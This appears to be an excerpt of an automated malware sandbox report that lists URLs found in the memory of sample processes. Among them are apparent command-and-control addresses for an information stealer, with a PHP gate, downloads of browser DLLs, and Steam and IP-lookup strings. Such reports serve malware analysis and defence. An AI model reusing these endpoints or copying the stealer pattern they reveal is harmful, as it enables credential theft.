Source: RegAsm.exe, 0000000F.00000002.2327203276.000000000112D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.000000000126D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll
Source: RegAsm.exe, 0000000F.00000002.2327203276.000000000112D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll_J
Source: RegAsm.exe, 0000002D.00000002.2959845385.000000000126D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dllk
Source: RegAsm.exe, 0000000F.00000002.2327203276.000000000112D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/4H0P
Source: RegAsm.exe, 0000002D.00000002.2959845385.000000000126D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/8
Source: RegAsm.exe, 0000002D.00000002.2959845385.000000000126D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/Z8cF
Source: RegAsm.exe, 0000002D.00000002.2984290523.00000000277E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php
Source: RegAsm.exe, 0000002D.00000002.2984290523.00000000277E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php)
Source: RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php1f9a9c4a2f8b514.cdf-ms
Source: RegAsm.exe, 0000000F.00000002.2327203276.000000000112D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpTB
Source: RegAsm.exe, 0000002D.00000002.2984290523.00000000277F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpen1iB
Source: RegAsm.exe, 0000000F.00000002.2351185924.000000002766B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpg
Source: RegAsm.exe, 0000002D.00000002.2984290523.00000000277E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpnu=
Source: RegAsm.exe, 0000000F.00000002.2325083864.00000000005CB000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2952782251.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpry=----CAFIEBKKJJDAKFHIDBFHultrelease
Source: RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpy)SP
Source: RegAsm.exe, 0000002D.00000002.2984290523.00000000277E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php~
Source: RegAsm.exe, 0000002D.00000002.2959845385.000000000126D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/pData
Source: RegAsm.exe, 0000002D.00000002.2952782251.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109FCFHorm-data;
Source: RegAsm.exe, 0000000F.00000002.2325083864.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109KFIEorm-data;
Source: RegAsm.exe, 0000002D.00000002.2959845385.000000000122A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109sO
Source: LKMService.exe, 00000001.00000002.4135113004.0000000002D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipi4
Source: LKMService.exe, 00000001.00000002.4135113004.000000000289F000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org
Source: LKMService.exe, 00000001.00000002.4135113004.0000000002849000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgD
Source: LKMService.exe, 00000001.00000002.4135113004.0000000002849000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.0000000002D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgd
Source: LKMService.exe, 00000001.00000002.4135113004.00000000027BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgp
Source: LKMService.exe, 00000001.00000002.4135113004.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify8
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr, userBAKKEGCAAE.exe.15.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: userBAKKEGCAAE.exe.15.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr, userBAKKEGCAAE.exe.15.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr, userBAKKEGCAAE.exe.15.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.KKFCAKEBKJKK
Source: RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.EBKJKK
Source: RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/
Source: RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgJKK
Source: 9nou8XrciU9ATc03f2Eu4OO2.exe, 0000000C.00000002.1888061677.0000000003E15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoKEBKJKK
Source: RegAsm.exe, 00000005.00000002.1882907666.0000000003B1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr, userBAKKEGCAAE.exe.15.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: userBAKKEGCAAE.exe.15.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr, userBAKKEGCAAE.exe.15.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: userBAKKEGCAAE.exe.15.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: userBAKKEGCAAE.exe.15.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: userBAKKEGCAAE.exe.15.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: 9nou8XrciU9ATc03f2Eu4OO2.exe, 0000000C.00000002.1871405522.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.c5
Source: userDHDAFBFCFH.exe, 00000034.00000002.2635142614.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.cr
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr, userBAKKEGCAAE.exe.15.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr, userBAKKEGCAAE.exe.15.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr, userBAKKEGCAAE.exe.15.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr, userBAKKEGCAAE.exe.15.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: LKMService.exe, 00000001.00000002.4135113004.0000000002711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000020.00000002.2117154587.000000000143B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000020.00000002.2117154587.000000000143B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000020.00000002.2117154587.000000000143B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr, userBAKKEGCAAE.exe.15.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.2358493205.000000006B49D000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 0000000F.00000002.2344136690.000000001B5FF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2357685829.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2556369428.000000001A612000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2577894444.00000000205BD000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 596a8ed0706146e48ded9036d0de8611.exe, 00000003.00000002.1765423290.00000000040D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000005.00000002.1879783411.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: LKMService.exe, 00000001.00000002.4135113004.0000000002849000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.000000000289F000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.0000000002908000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://yalubluseks.eu
Source: LKMService.exe, 00000001.00000002.4135113004.0000000002849000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.000000000289F000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.0000000002908000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://yalubluseks.eud
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.0000000000506000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9
Source: RegAsm.exe, 00000010.00000002.2677455575.0000000000584000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.0000000000563000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.0000000000588000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9.0.5938.132
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001264000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/&y
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/.
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001264000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/.y
Source: RegAsm.exe, 0000003C.00000002.2924485555.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/10/2024
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000102B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/1S
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/2
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/;
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000102B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/B
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/BKKFBAEGDH
Source: RegAsm.exe, 00000010.00000002.2705735289.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/C:
Source: RegAsm.exe, 00000010.00000002.2705735289.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/F
Source: RegAsm.exe, 00000010.00000002.2705735289.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/HDAKKJJJKJ
Source: RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/JECAEHJJJK
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001264000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/Vy
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000109F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/Z9&
Source: RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/_1
Source: RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/freebl3.dll
Source: RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/mozglue.dll
Source: RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/msvcp140.dll
Source: RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/nss3.dll
Source: RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/nss3.dll/_=h
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000102B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/s5A
Source: RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/softokn3.dll
Source: RegAsm.exe, 0000003C.00000002.2924485555.000000000055E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/sqlp.dll
Source: RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/sqlp.dll#
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000102B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/sqlp.dllY
Source: RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/vcruntime140.dll
Source: RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/vcruntime140.dllz
Source: RegAsm.exe, 00000010.00000002.2705735289.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/z
Source: RegAsm.exe, 00000029.00000002.3084958642.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9CBAFCF
Source: RegAsm.exe, 00000010.00000002.2677455575.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9CBFHCGHD--
Source: RegAsm.exe, 0000003C.00000002.2924485555.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9CBGCBG
Source: RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9FHCGHD
Source: RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9IEHJKF
